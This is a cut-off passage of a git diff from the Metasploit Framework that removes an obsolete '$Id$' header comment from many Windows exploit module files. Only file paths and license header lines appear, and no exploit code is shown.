a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index 18a4249c88..9a793d73f9 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index ca3cf7d831..ce274e3f22 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index fdec319167..b6ddfbd1d7 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index e007585a24..1efc36d0e4 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index e9b95ffcad..fb163a0d9a 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 0d46b3d905..edd397cbb5 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index c87a502a8f..f24449e482 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index b9f84f8f57..62faedfa03 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 4243d921ef..738900a9fa 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index 8dbdaaf78f..a8624480c9 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 867eac60b7..b5b9154d86 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index ae1bed34b1..4b1e315c97 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index c84f953d62..6475b0aeb7 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 6202127081..85295922e8 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index cb7441cedf..7dfee14ca2 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index b35c7bc453..983dbcd7bc 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index bc7f6e6148..0eb509b32b 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index 4a4e1f7dcb..a03efe77ec 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index f950851a41..c36fcae995 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index 2bba36acb4..48976091a6 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 5c862c5758..d1c4b86fda 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 442edbcdf4..909af837bf 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index de1838ee32..e2554a11bb 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 6820d2e245..701c39e932 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index afce00c2dd..8af478c0bd 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -1,7 +1,3 @@ -# -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b35f63f48f..2b30e6b992 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index 5a40cb2d77..d9a96f6714 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 40e6594c2f..81f0ffdc55 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 5677cdd2ab..1b6aea5568 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 1e5ca9ade9..4843ba5153 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 2d31be5e79..2cb35e6a5b 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index fbbdaf3643..a528833009 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 3bcfe0fac9..5f8e891837 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 09a7a05a66..74fc43382b 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 8ed65c5592..05c18cb9d1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 90c2e0ac99..ef4ece809e 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 92075a4c6f..decdd018b5 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index 25097ff6c6..ce652c02d9 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 1ee7dded23..03d4747002 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index e64e19685e..8d334865c7 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index 9340775398..b706ae695d 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index 68077164fd..d350604c4c 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 7c8be46cff..671822d7d2 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 977dc18e5a..0c291c2f41 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index e58eda82f8..1d33490ec1 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index da55d8cb08..6bfee35758 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index f9a70d3807..95e7f1aaf7 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index 039203c8ed..5cc2d1a2d0 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index d4f3f6c6ee..2f358ef4e8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 37dd3807f0..a9acccff53 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index ecdc2afd2d..44b177376a 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index a832eebf63..507b60327d 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 0fbf35406f..8a6db2efd8 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index a06e2646e7..b526b07d93 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 4f479ce004..3ffb3808ba 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index e2eb512213..f1bf038a48 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index a04d82f62e..1b01881a89 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 2d69004b7f..c8738f7731 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 9d5a6ad887..5c541b1e06 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 8b553300aa..747db6f52c 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3bdf0433aa..79a741f525 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 8f8e3a5d8f..68fe364705 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index b46c81e342..7f9da15538 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 331b8e0cf7..126af5afc2 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 890862a21a..308487741b 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index 1ebcde2f59..b5b5185930 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 1410cffc57..d194673933 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 7bac383c1c..b588144822 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index 2f417cfedd..d5208a4e0b 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git 